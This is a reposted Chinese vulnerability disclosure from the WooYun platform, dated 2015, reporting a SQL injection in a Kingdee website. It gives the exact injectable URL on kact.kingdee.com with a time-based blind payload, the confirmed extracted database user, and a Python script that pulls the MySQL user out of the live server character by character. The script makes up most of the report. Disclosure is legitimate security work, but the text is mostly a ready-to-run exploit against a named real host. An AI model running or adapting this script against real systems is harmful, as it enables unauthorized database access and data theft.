记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

金蝶某站点MySQL注射(附验证脚本)

2015-08-22 19:55
漏洞标题 金蝶某站点MySQL注射(附验证脚本)
相关厂商 金蝶
漏洞作者 lijiejie
提交时间 2015-06-12 16:01
公开时间 2015-07-30 08:52
漏洞类型 SQL注射漏洞
危害等级
自评Rank 8
漏洞状态 厂商已经确认
Tags标签

漏洞详情

注入点:

http://kact.kingdee.com/world/createArticle?corp_id=aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb

参数corp_id creator_id 等可以注入。 多个地址均存在,需复查。

漏洞证明:

[Done] MySQL user is [email protected] 

kingdee.png

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
for payload in payloads:
try:
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = "aaa'XOR(if(%s,sleep(3),0))OR'bbb" % s
conn = httplib.HTTPConnection('kact.kingdee.com', timeout=3)
conn.request(method='GET',url="/world/createArticle?corp_id=%s" % urllib.quote(s))
conn.getresponse()
conn.close()
print '.',
except:
user += payload
print '\n[in progress]', user,
time.sleep(3.0)
break

print '\n[Done] MySQL user is %s' % user

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


知识来源: www.secpulse.com/archives/35987.html

阅读:121980 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“金蝶某站点MySQL注射(附验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云